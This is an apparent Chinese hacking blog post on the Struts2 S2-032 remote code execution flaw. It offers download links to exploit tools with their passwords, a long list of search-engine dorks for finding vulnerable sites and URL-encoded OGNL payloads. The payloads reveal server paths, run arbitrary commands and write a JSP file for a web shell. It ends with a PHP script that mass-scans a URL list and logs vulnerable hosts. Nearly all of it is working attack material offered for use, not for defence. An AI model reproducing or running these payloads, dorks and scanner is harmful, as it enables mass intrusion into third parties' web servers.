struts2-032

作者：hack1990 时间：16-05-11 阅读数：3088人阅读

pain版利用工具：
链接：http://pan.baidu.com/s/1qXDL8ok 密码：9ka0
S2-032批量POC工具：
工具　
https://github.com/Xyntax/POC-T

简陋的POC
https://github.com/Xyntax/POC-T/blob/master/module/S2032.py

T0n9_小杰版利用工具：
链接: http://pan.baidu.com/s/1jIlNJsM 密码: 9gbf
解压密码：www.t0n9.com (备注有)

搜索引擎关键字：

inurl:VloginUser.action
inurl:Mail.action
inurl:code.action
inurl:reg.action
inurl:Address.action
inurl:!Index.action
inurl:login.action
inurl:Add.action
inurl:pageslist.action
inurl:action.Action
inurl:Message.action
inurl:Ldap.action
inurl:getMul.action
inurl:shouye.action
inurl:logout.action
inurl:Valid.action
inurl:search.action
inurl:Magazine.action
inurl:news.action
inurl:init.action
inurl:Page.action
inurl:create.action
inurl:index2.action
inurl:default.action
inurl:welcome.action
inurl:Name.action
inurl:single.action
inurl:updateForm.action
inurl:SysStart.action
inurl:adminlogin.action
inurl:Offportal.action
inurl:Buying.action
inurl:Success.action
inurl:exchange.action
inurl:menu.action
inurl:Load.action
inurl:airport.action
inurl:Email.action
inurl:On.action
inurl:show.action
inurl:tain.action
inurl:Login!input.action
inurl:randomPicture.action

shack2 改写的EXP

获取磁盘目录：

method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8

执行命令:

 1. 
  method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\\\A&ppp=%20&encoding=UTF-8
  2. 
  method:%23_memberAccess[%23parameters.name1[0]]%3dtrue,%23_memberAccess[%23parameters.name[0]]%3dtrue,%23_memberAccess[%23parameters.name2[0]]%3d{},%23_memberAccess[%23parameters.name3[0]]%3d{},%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew%20java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&name=allowStaticMethodAccess&name1=allowPrivateAccess&name2=excludedPackageNamePatterns&name3=excludedClasses&cmd=whoami&pp=\\\\A&ppp=%20&encoding=UTF-8

上传文件：

method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=stest.jsp&shellContent=tttt&encoding=UTF-8&pp=%2f

truts2 PHP批量扫描工具
php exp.php url.txt

<?php

/*
Strutr 批量扫描工具
By:T0n9
*/
error_reporting(0);
if(empty($argv[1])){
print_r("
+==================================+
| S2-032命令执行批量扫描工具 |
+==================================+

[+]程序还存在一些Bug 比如一些奇葩网站的回显误报相对较低
[+]扫完同目录生成文件名_ok.txt文本存放存在漏洞的网站
->php $argv[0] url.txt
");exit;
}

$txt = explode("\n",file_get_contents($argv[1])); //要扫描的脚本

echo "[+]$argv[1] 共 ".count($txt)." 条\r\n";

//获取盘符路径POC
$poc = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8";

for($i = 0;$i<count($txt);$i++){
if(!empty($txt[$i])){
    $u = trim($txt[$i]).$poc;
    $data_str = c($u);
    if(stripos($data_str,"</") || empty($data_str)){
      echo trim($txt[$i])." No \n";
    }else{
      echo trim($txt[$i])." Yes Path:".trim($data_str)." \n";
      $fp = fopen($argv[1]."_OK.txt",'a+');
      fwrite($fp,trim($txt[$i])."\r\n");
      fclose($fp);
    }
}
}
echo "\r\n[+]扫描完毕请到".$argv[1]."_OK.txt查看结果";

function c($url){
$c = curl_init();
curl_setopt($c,CURLOPT_URL,$url);
curl_setopt($c,CURLOPT_BINARYTRANSFER,true);
curl_setopt($c, CURLOPT_HEADER, 0);
curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($c, CURLOPT_TIMEOUT, 15);
curl_setopt($c, CURLOPT_REFERER, $url);
curl_setopt($c,CURLOPT_RETURNTRANSFER,1);
$data = curl_exec($c);
return $data;
curl_close($c);
}

# struts2-032 # Hack1990.Com

上一篇：wordpress WPImageEditorImagick 指令注入漏洞修复

下一篇：root.cool开源

struts2-032

相关文章

发表评论